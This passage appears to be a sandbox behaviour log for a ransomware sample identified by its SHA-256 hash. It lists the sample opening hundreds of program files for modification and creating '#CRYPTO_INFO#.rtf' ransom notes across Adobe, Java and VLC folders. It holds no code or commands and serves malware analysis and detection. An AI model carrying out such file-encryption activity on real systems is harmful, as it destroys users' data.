8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\id_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_sv.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fr_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\no_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-options.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\klist.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_reader_logo.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\share.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_signed_out.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\classfile_constants.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 